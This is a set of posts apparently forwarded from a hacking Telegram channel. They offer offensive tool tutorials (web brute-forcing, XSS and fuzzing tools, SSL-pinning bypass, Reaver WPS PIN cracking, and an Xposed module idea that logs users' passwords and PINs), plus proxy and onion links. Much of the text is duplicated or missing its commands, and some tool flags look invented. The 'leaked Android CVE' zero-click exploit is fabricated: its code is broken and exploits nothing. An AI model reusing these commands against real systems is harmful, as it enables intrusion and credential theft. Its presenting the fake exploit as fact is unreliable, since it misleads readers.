Forwarded from Exploiting Crew (Pr1vAt3)
2. Create Custom Modules:
- Write your own Xposed modules to hook specific functions in Android apps.
- For example, create a module that logs when a user inputs sensitive data like a password or PIN.
---
### Step 6: Reporting Findings
- Log Results: Document all hooks and modifications made during the testing process. This can help in creating a detailed report on vulnerabilities such as insecure data handling, poor encryption, or API flaws.
- Create Exploits: Automate exploit generation using custom modules for repeated tests on similar vulnerabilities.
---
### Ethical Considerations
- Always ensure you have explicit permission to test any app.
- Use Xposed responsibly for ethical hacking and security research only.
---
Let me know if you'd like more details on specific Xposed modules or techniques!
- Write your own Xposed modules to hook specific functions in Android apps.
- For example, create a module that logs when a user inputs sensitive data like a password or PIN.
---
### Step 6: Reporting Findings
- Log Results: Document all hooks and modifications made during the testing process. This can help in creating a detailed report on vulnerabilities such as insecure data handling, poor encryption, or API flaws.
- Create Exploits: Automate exploit generation using custom modules for repeated tests on similar vulnerabilities.
---
### Ethical Considerations
- Always ensure you have explicit permission to test any app.
- Use Xposed responsibly for ethical hacking and security research only.
---
Let me know if you'd like more details on specific Xposed modules or techniques!
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Xposed Framework, a powerful tool for Android customization and hacking. Xposed allows you to modify system and app behavior without modifying APKs, making it a great tool for penetration testers and security researchers.
---
## Xposed Framework Hacking Tutorial
Xposed Framework is a tool for Android devices that allows you to modify system-level behavior and individual apps at runtime. It provides hooks that enable you to change app behavior, bypass protections, or test for vulnerabilities.
### Prerequisites
1. Rooted Android Device:
To use Xposed, your device needs to be rooted. Tools like Magisk or SuperSU can be used for rooting.
2. Install Xposed Framework:
- Download the Xposed Installer APK from [Xposed's official site](https://repo.xposed.info/).
- Install the APK on your rooted Android device.
3. Install Xposed Modules:
Modules are what allow Xposed to hook into apps and change their behavior.
- Popular modules for security testing include:
- App Settings (to modify app permissions and behavior).
- XPrivacyLua (for manipulating app permissions).
- Substrate (for advanced hooking capabilities).
---
### Step 1: Basic Setup
1. Enable Xposed Framework:
Once installed, open the Xposed Installer app. Enable the framework and reboot your device.
2. Install Modules:
After enabling the framework, go to the "Download" section in the Xposed Installer, search for modules like XPrivacyLua (for privacy manipulation) or App Settings (to change app settings), and install them.
---
### Step 2: Analyzing an App
1. Hooking into an App:
- Open the Xposed Installer and go to the Modules tab.
- Enable the App Settings or XPrivacyLua module, and configure the hooks to manipulate or bypass app behavior.
2. Modify App Permissions:
- Use XPrivacyLua to deny apps specific permissions like camera, location, SMS, or contacts.
- For example, you can stop apps from sending sensitive data over the network.
3. Bypass SSL Pinning:
- If an app uses SSL pinning to prevent certificate manipulation, use Xposed SSL Unpinning modules.
- These modules hook into the SSL connection code and allow interception of SSL traffic.
---
### Step 3: Exploiting Vulnerabilities
1. Test for Hardcoded Credentials:
- You can use App Settings to modify app behavior dynamically and check if apps have hardcoded credentials or perform insecure operations.
- Modify app functions at runtime to bypass authentication and access restricted parts of the app.
2. Bypass Root Detection:
- Many apps detect whether they are running on a rooted device and block access if they find out. You can use RootCloak or similar modules to bypass this check.
3. Monitor Network Traffic:
- Use Burp Suite in conjunction with Xposed to inspect and modify network traffic.
- Set up a proxy on your device, intercept requests, and look for vulnerabilities like insecure data transmission or exposed API keys.
---
### Step 4: Advanced Hooking
1. Hook System Methods:
Xposed allows you to hook into system functions. For example:
This example hooks into the
2. Manipulate the UI:
Modify the appβs UI behavior, such as bypassing confirmation dialogs or manipulating elements, by hooking UI-related methods.
---
### Step 5: Testing and Debugging
1. Use Xposed for Debugging:
- Monitor method calls and function behavior in real time using logging or a custom debug module.
- Example: Intercept a method that retrieves sensitive information and log it to the console for further analysis.
---
## Xposed Framework Hacking Tutorial
Xposed Framework is a tool for Android devices that allows you to modify system-level behavior and individual apps at runtime. It provides hooks that enable you to change app behavior, bypass protections, or test for vulnerabilities.
### Prerequisites
1. Rooted Android Device:
To use Xposed, your device needs to be rooted. Tools like Magisk or SuperSU can be used for rooting.
2. Install Xposed Framework:
- Download the Xposed Installer APK from [Xposed's official site](https://repo.xposed.info/).
- Install the APK on your rooted Android device.
3. Install Xposed Modules:
Modules are what allow Xposed to hook into apps and change their behavior.
- Popular modules for security testing include:
- App Settings (to modify app permissions and behavior).
- XPrivacyLua (for manipulating app permissions).
- Substrate (for advanced hooking capabilities).
---
### Step 1: Basic Setup
1. Enable Xposed Framework:
Once installed, open the Xposed Installer app. Enable the framework and reboot your device.
2. Install Modules:
After enabling the framework, go to the "Download" section in the Xposed Installer, search for modules like XPrivacyLua (for privacy manipulation) or App Settings (to change app settings), and install them.
---
### Step 2: Analyzing an App
1. Hooking into an App:
- Open the Xposed Installer and go to the Modules tab.
- Enable the App Settings or XPrivacyLua module, and configure the hooks to manipulate or bypass app behavior.
2. Modify App Permissions:
- Use XPrivacyLua to deny apps specific permissions like camera, location, SMS, or contacts.
- For example, you can stop apps from sending sensitive data over the network.
3. Bypass SSL Pinning:
- If an app uses SSL pinning to prevent certificate manipulation, use Xposed SSL Unpinning modules.
- These modules hook into the SSL connection code and allow interception of SSL traffic.
---
### Step 3: Exploiting Vulnerabilities
1. Test for Hardcoded Credentials:
- You can use App Settings to modify app behavior dynamically and check if apps have hardcoded credentials or perform insecure operations.
- Modify app functions at runtime to bypass authentication and access restricted parts of the app.
2. Bypass Root Detection:
- Many apps detect whether they are running on a rooted device and block access if they find out. You can use RootCloak or similar modules to bypass this check.
3. Monitor Network Traffic:
- Use Burp Suite in conjunction with Xposed to inspect and modify network traffic.
- Set up a proxy on your device, intercept requests, and look for vulnerabilities like insecure data transmission or exposed API keys.
---
### Step 4: Advanced Hooking
1. Hook System Methods:
Xposed allows you to hook into system functions. For example:
XposedBridge.hookAllMethods(Class.forName("android.app.Activity"), "onPause", new XC_MethodHook() {
@Override
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
Log.d("Xposed", "Activity is pausing: " + param.method.getName());
}
});
This example hooks into the
onPause method of all activities to log when any activity is paused. You can customize hooks for specific methods based on your analysis.2. Manipulate the UI:
Modify the appβs UI behavior, such as bypassing confirmation dialogs or manipulating elements, by hooking UI-related methods.
---
### Step 5: Testing and Debugging
1. Use Xposed for Debugging:
- Monitor method calls and function behavior in real time using logging or a custom debug module.
- Example: Intercept a method that retrieves sensitive information and log it to the console for further analysis.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: Gobuster - Directory and File Brute Forcing
Gobuster is a tool used for brute forcing directories and files on web servers, often used to discover hidden resources and files that could be vulnerable.
---
### Basic Usage Command:
Explanation:
-
-
-
-
---
### Example: Brute Force with Status Code Filtering
Explanation:
-
---
### Example: Brute Force Subdomains
Explanation:
-
-
-
---
### Example: Using Custom User-Agent
Explanation:
-
---
### Example: Using Multiple Threads
Explanation:
-
---
### Important Notes:
1. Gobuster is mainly used in penetration testing and security research.
2. Always obtain permission before using Gobuster for brute-forcing directories, files, or subdomains. Unauthorized testing can result in legal consequences.
Gobuster is a tool used for brute forcing directories and files on web servers, often used to discover hidden resources and files that could be vulnerable.
---
### Basic Usage Command:
gobuster dir -u http://example.com -w /path/to/wordlist.txt
Explanation:
-
gobuster: Runs the Gobuster tool.-
dir: Specifies the mode to brute-force directories and files.-
-u http://example.com: The target URL to scan.-
-w /path/to/wordlist.txt: Specifies the path to a wordlist that contains potential directory and file names.---
### Example: Brute Force with Status Code Filtering
gobuster dir -u http://example.com -w /path/to/wordlist.txt -s "200,301"
Explanation:
-
-s "200,301": Filters results to only show directories and files that return HTTP status codes 200 (OK) and 301 (Moved Permanently), indicating valid paths.---
### Example: Brute Force Subdomains
gobuster dns -d example.com -w /path/to/subdomains.txt
Explanation:
-
dns: Specifies the mode to brute-force subdomains.-
-d example.com: The domain to search for subdomains.-
-w /path/to/subdomains.txt: Path to a wordlist containing possible subdomains.---
### Example: Using Custom User-Agent
gobuster dir -u http://example.com -w /path/to/wordlist.txt -H "User-Agent: CustomAgent"
Explanation:
-
-H "User-Agent: CustomAgent": Specifies a custom user-agent to avoid detection or bypass certain filters.---
### Example: Using Multiple Threads
gobuster dir -u http://example.com -w /path/to/wordlist.txt -t 50
Explanation:
-
-t 50: Sets the number of concurrent threads to 50, speeding up the brute-forcing process.---
### Important Notes:
1. Gobuster is mainly used in penetration testing and security research.
2. Always obtain permission before using Gobuster for brute-forcing directories, files, or subdomains. Unauthorized testing can result in legal consequences.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: Acunetix - Web Application Security Scanner
Acunetix is an automated web application security scanner used to find vulnerabilities in web applications, including SQL injections, cross-site scripting (XSS), and other vulnerabilities.
---
### Basic Usage Command:
Explanation:
-
-
---
### Example: Scan with Authentication
Explanation:
-
-
---
### Example: Scan Specific URLs
Explanation:
-
---
### Example: Output to a Report
Explanation:
-
---
### Example: Running an Automated Scheduled Scan
Explanation:
-
---
### Important Notes:
1. Acunetix is a commercial tool widely used for comprehensive web security testing.
2. Always have explicit authorization to scan and test web applications. Unauthorized scanning may lead to legal consequences.
Acunetix is an automated web application security scanner used to find vulnerabilities in web applications, including SQL injections, cross-site scripting (XSS), and other vulnerabilities.
---
### Basic Usage Command:
acunetix start --target=http://example.com
Explanation:
-
acunetix start: Starts the Acunetix scan.-
--target=http://example.com: Specifies the target URL to scan for vulnerabilities.---
### Example: Scan with Authentication
acunetix start --target=http://example.com --auth-user=admin --auth-pass=password123
Explanation:
-
--auth-user=admin: Provides the username for basic authentication.-
--auth-pass=password123: Provides the password for basic authentication.---
### Example: Scan Specific URLs
acunetix start --target=http://example.com --scan-url="http://example.com/admin"
Explanation:
-
--scan-url="http://example.com/admin": Specifies a specific URL to scan within the target domain.---
### Example: Output to a Report
acunetix start --target=http://example.com --report-file=scan_report.pdf
Explanation:
-
--report-file=scan_report.pdf: Saves the scan results to a PDF report.---
### Example: Running an Automated Scheduled Scan
acunetix schedule --target=http://example.com --time="03:00"
Explanation:
-
--time="03:00": Schedules the scan to run at a specific time (3:00 AM).---
### Important Notes:
1. Acunetix is a commercial tool widely used for comprehensive web security testing.
2. Always have explicit authorization to scan and test web applications. Unauthorized scanning may lead to legal consequences.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: XSSer - Cross-Site Scripting (XSS) Attack Tool
XSSer is an automated tool used to detect and exploit Cross-Site Scripting (XSS) vulnerabilities in web applications. It helps identify places where attackers can inject malicious scripts into web pages viewed by other users.
---
### Basic Usage Command:
Explanation:
-
-
---
### Example: Using XSSer with a Payload List
Explanation:
-
---
### Example: Scanning Multiple URLs for XSS
Explanation:
-
---
### Example: Running XSSer in Brute-Force Mode
Explanation:
-
---
### Example: Using Proxy for Traffic Capture
Explanation:
-
---
### Important Notes:
1. XSSer is designed for ethical hacking and penetration testing.
2. Always ensure you have explicit permission to perform security testing, as unauthorized exploitation of XSS vulnerabilities is illegal.
XSSer is an automated tool used to detect and exploit Cross-Site Scripting (XSS) vulnerabilities in web applications. It helps identify places where attackers can inject malicious scripts into web pages viewed by other users.
---
### Basic Usage Command:
xsser -u http://example.com/page?id=1
Explanation:
-
xsser: Runs the XSSer tool.-
-u http://example.com/page?id=1: Specifies the target URL where XSS vulnerabilities are to be tested (in this case, the id parameter).---
### Example: Using XSSer with a Payload List
xsser -u http://example.com/page?id=1 -p /path/to/payloads.txt
Explanation:
-
-p /path/to/payloads.txt: Specifies the path to a file containing different XSS payloads to test.---
### Example: Scanning Multiple URLs for XSS
xsser -u http://example.com/page?id=1 -u http://example.com/page?id=2
Explanation:
-
-u http://example.com/page?id=2: Allows specifying multiple URLs to test for XSS vulnerabilities.---
### Example: Running XSSer in Brute-Force Mode
xsser -u http://example.com/page?id=1 --brute
Explanation:
-
--brute: Enables brute-force scanning mode, testing various parameters and payload combinations for XSS vulnerabilities.---
### Example: Using Proxy for Traffic Capture
xsser -u http://example.com/page?id=1 --proxy="http://127.0.0.1:8080"
Explanation:
-
--proxy="http://127.0.0.1:8080": Routes traffic through a proxy (useful for capturing requests and responses or evading detection).---
### Important Notes:
1. XSSer is designed for ethical hacking and penetration testing.
2. Always ensure you have explicit permission to perform security testing, as unauthorized exploitation of XSS vulnerabilities is illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: Sublist3r - Subdomain Enumeration Tool
Sublist3r is a fast subdomain enumeration tool designed to gather subdomains of a target domain. It utilizes various search engines and other methods to discover hidden subdomains, which can be crucial for security testing.
---
### Basic Usage Command:
Explanation:
-
-
---
### Example: Saving Results to a File
Explanation:
-
---
### Example: Using Multiple Engines for Enumeration
Explanation:
-
---
### Example: Limit Number of Results
Explanation:
-
---
### Example: Displaying Verbose Output
Explanation:
-
---
### Important Notes:
1. Sublist3r is commonly used for reconnaissance during penetration testing and bug bounty programs.
2. Always ensure you have explicit authorization before performing subdomain enumeration on a domain. Unauthorized scanning can lead to legal issues.
Sublist3r is a fast subdomain enumeration tool designed to gather subdomains of a target domain. It utilizes various search engines and other methods to discover hidden subdomains, which can be crucial for security testing.
---
### Basic Usage Command:
sublist3r -d example.com
Explanation:
-
sublist3r: Runs the Sublist3r tool.-
-d example.com: Specifies the target domain (example.com) to search for subdomains.---
### Example: Saving Results to a File
sublist3r -d example.com -o subdomains.txt
Explanation:
-
-o subdomains.txt: Saves the found subdomains into a text file (subdomains.txt).---
### Example: Using Multiple Engines for Enumeration
sublist3r -d example.com -b
Explanation:
-
-b: Uses brute-force techniques and other search engines to enumerate more subdomains.---
### Example: Limit Number of Results
sublist3r -d example.com -t 50
Explanation:
-
-t 50: Limits the number of threads to 50 for enumeration. This can be adjusted based on the speed and load requirements.---
### Example: Displaying Verbose Output
sublist3r -d example.com -v
Explanation:
-
-v: Enables verbose mode, showing detailed output for each subdomain found.---
### Important Notes:
1. Sublist3r is commonly used for reconnaissance during penetration testing and bug bounty programs.
2. Always ensure you have explicit authorization before performing subdomain enumeration on a domain. Unauthorized scanning can lead to legal issues.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: DirBuster - Directory and File Bruteforcing
DirBuster is a multi-threaded Java application used to brute-force directories and files on web servers. It's typically used to find hidden resources that might expose vulnerabilities in web applications.
---
### Basic Usage Command:
Explanation:
-
-
-
---
### Example: Specifying a Custom HTTP Port
Explanation:
-
---
### Example: Brute Forcing with Multiple Threads
Explanation:
-
---
### Example: Saving Results to a File
Explanation:
-
---
### Example: Using a Proxy
Explanation:
-
---
### Important Notes:
1. DirBuster is a powerful tool for penetration testers looking to discover hidden files and directories on a target.
2. Always ensure you have proper authorization to scan the target server, as unauthorized brute-forcing is illegal and unethical.
DirBuster is a multi-threaded Java application used to brute-force directories and files on web servers. It's typically used to find hidden resources that might expose vulnerabilities in web applications.
---
### Basic Usage Command:
java -jar dirbuster.jar -u http://example.com -l /path/to/wordlist.txt
Explanation:
-
java -jar dirbuster.jar: Runs the DirBuster Java application.-
-u http://example.com: Specifies the target URL to scan.-
-l /path/to/wordlist.txt: Specifies the path to the wordlist containing potential directory and file names.---
### Example: Specifying a Custom HTTP Port
java -jar dirbuster.jar -u http://example.com:8080 -l /path/to/wordlist.txt
Explanation:
-
http://example.com:8080: Scans a target on a specific port (8080 in this case), useful if the web server is running on a non-standard port.---
### Example: Brute Forcing with Multiple Threads
java -jar dirbuster.jar -u http://example.com -l /path/to/wordlist.txt -t 50
Explanation:
-
-t 50: Specifies 50 concurrent threads to speed up the brute-forcing process.---
### Example: Saving Results to a File
java -jar dirbuster.jar -u http://example.com -l /path/to/wordlist.txt -o /path/to/output.txt
Explanation:
-
-o /path/to/output.txt: Saves the scan results to the specified output file (output.txt).---
### Example: Using a Proxy
java -jar dirbuster.jar -u http://example.com -l /path/to/wordlist.txt -p 127.0.0.1:8080
Explanation:
-
-p 127.0.0.1:8080: Routes traffic through a proxy server (useful for anonymizing the scan or debugging).---
### Important Notes:
1. DirBuster is a powerful tool for penetration testers looking to discover hidden files and directories on a target.
2. Always ensure you have proper authorization to scan the target server, as unauthorized brute-forcing is illegal and unethical.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: Wfuzz - Web Application Fuzzing Tool
Wfuzz is a web application vulnerability scanner used to perform fuzzing attacks. It is commonly used for brute-forcing web applications to find hidden directories, files, and parameters that could be vulnerable to attacks like SQL injection or file inclusion.
---
### Basic Usage Command:
Explanation:
-
-
-
-
---
### Example: Fuzzing Multiple Parameters
Explanation:
-
---
### Example: Fuzzing HTTP Headers
Explanation:
-
---
### Example: Using a Proxy for Traffic
Explanation:
-
---
### Example: Brute Force Directories
Explanation:
-
---
### Example: Fuzzing with Recursive Mode
Explanation:
-
---
### Important Notes:
1. Wfuzz is highly effective for brute-forcing hidden parameters and files in web applications.
2. Always obtain explicit permission to perform fuzzing and penetration tests, as unauthorized scanning can be illegal.
Wfuzz is a web application vulnerability scanner used to perform fuzzing attacks. It is commonly used for brute-forcing web applications to find hidden directories, files, and parameters that could be vulnerable to attacks like SQL injection or file inclusion.
---
### Basic Usage Command:
wfuzz -c -z file,/path/to/wordlist.txt -u http://example.com/FUZZ
Explanation:
-
wfuzz: Runs the Wfuzz tool.-
-c: Enables colorized output for easier reading of results.-
-z file,/path/to/wordlist.txt: Specifies a wordlist for fuzzing.-
-u http://example.com/FUZZ: The target URL where FUZZ is the placeholder for words in the wordlist to be tested.---
### Example: Fuzzing Multiple Parameters
wfuzz -c -z file,/path/to/wordlist.txt -u http://example.com/page.php?id=FUZZ&user=admin
Explanation:
-
id=FUZZ&user=admin: Fuzzes the id parameter while keeping the user parameter fixed.---
### Example: Fuzzing HTTP Headers
wfuzz -c -z file,/path/to/wordlist.txt -H "X-Secret: FUZZ" http://example.com
Explanation:
-
-H "X-Secret: FUZZ": Fuzzes a custom HTTP header (X-Secret) by injecting different words from the wordlist.---
### Example: Using a Proxy for Traffic
wfuzz -c -z file,/path/to/wordlist.txt -u http://example.com/FUZZ --proxy http://127.0.0.1:8080
Explanation:
-
--proxy http://127.0.0.1:8080: Routes the fuzzing traffic through a proxy for anonymity or to capture the traffic.---
### Example: Brute Force Directories
wfuzz -c -z dir,/path/to/dirlist.txt -u http://example.com/FUZZ
Explanation:
-
-z dir,/path/to/dirlist.txt: Fuzzes directory names from the specified wordlist to discover hidden directories on the server.---
### Example: Fuzzing with Recursive Mode
wfuzz -c -z file,/path/to/wordlist.txt -u http://example.com/FUZZ -r
Explanation:
-
-r: Enables recursive fuzzing, where Wfuzz continues fuzzing on discovered directories or files.---
### Important Notes:
1. Wfuzz is highly effective for brute-forcing hidden parameters and files in web applications.
2. Always obtain explicit permission to perform fuzzing and penetration tests, as unauthorized scanning can be illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: OWASP ZAP - Zed Attack Proxy
OWASP ZAP (Zed Attack Proxy) is an open-source web application security scanner. It is used to identify vulnerabilities in web applications through automated scanning and manual testing. ZAP helps detect issues like SQL injection, cross-site scripting (XSS), and more.
---
### Basic Usage Command:
1. Start OWASP ZAP by running the following command (after installing it):
Explanation:
-
---
### Example: Automated Scan Using ZAP's API
Explanation:
-
-
---
### Example: Start ZAP in Headless Mode for Automation
Explanation:
-
-
-
---
### Example: Scan with Specific Context
Explanation:
-
-
-
---
### Important Notes:
1. OWASP ZAP is highly customizable and can be extended with a variety of plugins to enhance its functionality.
2. It's great for both beginners and experienced penetration testers, thanks to its automated scanning and manual testing features.
3. Ensure you have authorization to test the application before running ZAP on a target website.
OWASP ZAP (Zed Attack Proxy) is an open-source web application security scanner. It is used to identify vulnerabilities in web applications through automated scanning and manual testing. ZAP helps detect issues like SQL injection, cross-site scripting (XSS), and more.
---
### Basic Usage Command:
1. Start OWASP ZAP by running the following command (after installing it):
zap.sh
Explanation:
-
zap.sh: Launches the OWASP ZAP application from the command line.---
### Example: Automated Scan Using ZAP's API
zap-cli quick-scan -u http://example.com
Explanation:
-
zap-cli quick-scan: Initiates a quick scan of the web application.-
-u http://example.com: Specifies the target URL to be scanned.---
### Example: Start ZAP in Headless Mode for Automation
zap.sh -daemon -port 8080 -host 127.0.0.1
Explanation:
-
-daemon: Starts ZAP in headless (non-GUI) mode, which is suitable for automation.-
-port 8080: Sets the port for the ZAP proxy to listen on (default is 8080).-
-host 127.0.0.1: Sets the host address to localhost.---
### Example: Scan with Specific Context
zap-cli spider -c -u http://example.com
Explanation:
-
spider: Crawls the target website to discover pages.-
-c: Continues crawling from any previously discovered URLs.-
-u http://example.com: The URL to start the crawl from.---
### Important Notes:
1. OWASP ZAP is highly customizable and can be extended with a variety of plugins to enhance its functionality.
2. It's great for both beginners and experienced penetration testers, thanks to its automated scanning and manual testing features.
3. Ensure you have authorization to test the application before running ZAP on a target website.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: SSLUnpinning - SSL Pinning Bypass Tool for Android
SSLUnpinning is a tool designed to bypass SSL pinning on Android applications. SSL pinning is a security technique that prevents man-in-the-middle (MITM) attacks by ensuring that the client only trusts a predefined certificate or public key. SSLUnpinning helps in bypassing this mechanism during security assessments or penetration testing.
---
### Basic Usage Command:
To use SSLUnpinning, you typically need to decompile the APK, patch it, and then recompile it. Here's the general approach:
1. Decompile the APK (using tools like APKTool or jadx):
2. Patch the APK with SSLUnpinning:
- Use the provided SSLUnpinning script or modify the decompiled code to disable SSL pinning manually.
3. Recompile the APK:
4. Sign the APK (to ensure it can be installed on a device):
5. Install the patched APK:
---
### Important Notes:
- SSL Pinning Bypass is useful when testing applications for vulnerabilities but can only be performed if you have authorization to do so.
- Repackaging and patching APKs may break other functionality or be detected by the application if additional protections are in place.
SSLUnpinning is a tool designed to bypass SSL pinning on Android applications. SSL pinning is a security technique that prevents man-in-the-middle (MITM) attacks by ensuring that the client only trusts a predefined certificate or public key. SSLUnpinning helps in bypassing this mechanism during security assessments or penetration testing.
---
### Basic Usage Command:
To use SSLUnpinning, you typically need to decompile the APK, patch it, and then recompile it. Here's the general approach:
1. Decompile the APK (using tools like APKTool or jadx):
apktool d app.apk
2. Patch the APK with SSLUnpinning:
- Use the provided SSLUnpinning script or modify the decompiled code to disable SSL pinning manually.
3. Recompile the APK:
apktool b app -o app_modified.apk
4. Sign the APK (to ensure it can be installed on a device):
jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.jks app_modified.apk alias_name
5. Install the patched APK:
adb install app_modified.apk
---
### Important Notes:
- SSL Pinning Bypass is useful when testing applications for vulnerabilities but can only be performed if you have authorization to do so.
- Repackaging and patching APKs may break other functionality or be detected by the application if additional protections are in place.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Tool: Reaver - WPS PIN Brute-Forcing Tool
Reaver is a powerful tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) to recover the PIN used for authentication in wireless routers. It allows attackers to brute-force the WPS PIN and gain access to the target network.
---
### Basic Usage Command:
Explanation:
-
-
-
-
---
### Example: Specify a WPS PIN to Brute-Force
Explanation:
-
-
---
### Example: Save Results to a File
Explanation:
-
---
### Important Notes:
1. Reaver works only on routers with WPS enabled, and the attack may take several hours to complete depending on the router's implementation of WPS.
2. Legal Considerations: Always ensure that you have explicit permission to perform wireless network penetration testing on the target system. Unauthorized use of Reaver is illegal.
Reaver is a powerful tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) to recover the PIN used for authentication in wireless routers. It allows attackers to brute-force the WPS PIN and gain access to the target network.
---
### Basic Usage Command:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv
Explanation:
-
reaver: Runs the Reaver tool.-
-i wlan0: Specifies the wireless network interface to use (replace wlan0 with your network interface name).-
-b XX:XX:XX:XX:XX:XX: Specifies the target router's BSSID (MAC address).-
-vv: Enables verbose output to display more information during the attack.---
### Example: Specify a WPS PIN to Brute-Force
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -p 12345670 -vv
Explanation:
-
-p 12345670: Attempts a specific WPS PIN, instead of brute-forcing the entire PIN.-
-vv: Provides detailed output for monitoring progress.---
### Example: Save Results to a File
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv -o /path/to/output.txt
Explanation:
-
-o /path/to/output.txt: Saves the output to a specified file for later analysis.---
### Important Notes:
1. Reaver works only on routers with WPS enabled, and the attack may take several hours to complete depending on the router's implementation of WPS.
2. Legal Considerations: Always ensure that you have explicit permission to perform wireless network penetration testing on the target system. Unauthorized use of Reaver is illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦The New Leaked Android CVE:
Android System Server RCE:
The Android System Server is responsible for managing system services and processes. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level.
Deployment and Execution
Build the malicious dex file using the dx tool from the Android SDK:
Create a new APK that includes the malicious dex file and any required dependencies:
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.androidexploit">
<application>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
Sign the APK with a valid signing certificate:
Install the signed APK on a vulnerable device.
Why it Works
The Android System Server is responsible for managing system services and processes, including the package manager. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level, gaining full control over the device.
Custom Zero-Click Exploit: Android Package Manager Service (PackageManagerService)
Create a custom zero-click exploit that targets a vulnerability in the Android Package Manager Service (PackageManagerService). This service is responsible for managing application installations and updates. Your exploit should allow an attacker to execute arbitrary code with system privileges.
Exploit Code
import android.content.pm.PackageParser;
import android.os.Build;
import android.os.Bundle;
import dalvik.system.DexClassLoader;
public class MainActivity extends androidx.appcompat.app.AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
// Load the malicious dex file
String[] paths = getPackageCodePath().split(" ");
DexClassLoader cl = new DexClassLoader(paths, getPackageCodePath(), null, getClass().getClassLoader());
// Invoke the RCE method from the dex file
try {
Method m = cl.loadClass("com.example.malicious.Malware").getDeclaredMethod("executeRCE", String.class);
m.invoke(null, "Hello, Android!");
} catch (Exception e) {
e.printStackTrace();
}
}
}
How to Run
Build the malicious dex file using the dx tool from the Android SDK:
dx --dex --output=myexploit.dex myexploit.class
Create a new APK that includes the malicious dex file and any required dependencies.
Sign the APK with a valid signing certificate.
Install the signed APK on a vulnerable device.
Android System Server RCE:
The Android System Server is responsible for managing system services and processes. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level.
Deployment and Execution
Build the malicious dex file using the dx tool from the Android SDK:
dx --dex --output=myexploit.dex myexploit.class
Create a new APK that includes the malicious dex file and any required dependencies:
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.androidexploit">
<application>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
Sign the APK with a valid signing certificate:
jarsigner -verbose -keystore mykeystore.keystore SysIntel.apk SysIntell
Install the signed APK on a vulnerable device.
Why it Works
The Android System Server is responsible for managing system services and processes, including the package manager. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level, gaining full control over the device.
Custom Zero-Click Exploit: Android Package Manager Service (PackageManagerService)
Create a custom zero-click exploit that targets a vulnerability in the Android Package Manager Service (PackageManagerService). This service is responsible for managing application installations and updates. Your exploit should allow an attacker to execute arbitrary code with system privileges.
Exploit Code
import android.content.pm.PackageParser;
import android.os.Build;
import android.os.Bundle;
import dalvik.system.DexClassLoader;
public class MainActivity extends androidx.appcompat.app.AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
// Load the malicious dex file
String[] paths = getPackageCodePath().split(" ");
DexClassLoader cl = new DexClassLoader(paths, getPackageCodePath(), null, getClass().getClassLoader());
// Invoke the RCE method from the dex file
try {
Method m = cl.loadClass("com.example.malicious.Malware").getDeclaredMethod("executeRCE", String.class);
m.invoke(null, "Hello, Android!");
} catch (Exception e) {
e.printStackTrace();
}
}
}
How to Run
Build the malicious dex file using the dx tool from the Android SDK:
dx --dex --output=myexploit.dex myexploit.class
Create a new APK that includes the malicious dex file and any required dependencies.
Sign the APK with a valid signing certificate.
Install the signed APK on a vulnerable device.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Here are the URLs for the extended list of free proxy sites:
1. CroxyProxy
https://www.croxyproxy.com
2. TurboHide
https://www.turbohide.com
3. VPNBook
https://www.vpnbook.com/webproxy
4. FilterBypass
https://www.filterbypass.me
5. Hidester
https://hidester.com/proxy/
6. Mywebproxy
https://mywebproxy.com/
7. Proxyium
https://proxyium.com
8. Anonymizing
https://anonymizing.com/
9. NetNut
https://www.netnut.io/
10. Plain Proxies
https://www.plainproxies.com/
1. CroxyProxy
https://www.croxyproxy.com
2. TurboHide
https://www.turbohide.com
3. VPNBook
https://www.vpnbook.com/webproxy
4. FilterBypass
https://www.filterbypass.me
5. Hidester
https://hidester.com/proxy/
6. Mywebproxy
https://mywebproxy.com/
7. Proxyium
https://proxyium.com
8. Anonymizing
https://anonymizing.com/
9. NetNut
https://www.netnut.io/
10. Plain Proxies
https://www.plainproxies.com/
Croxyproxy
Free web proxy and a cutting-edge online proxy | CroxyProxy
CroxyProxy is a cutting-edge secure web proxy service. Use it to access your favorite websites and web applications: as a Facebook or YouTube proxy. It is free, you can try this online proxy right now!
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Dark Web Websites (Updated) :
http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/ β DanielWin
http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/ β Hidden Answers
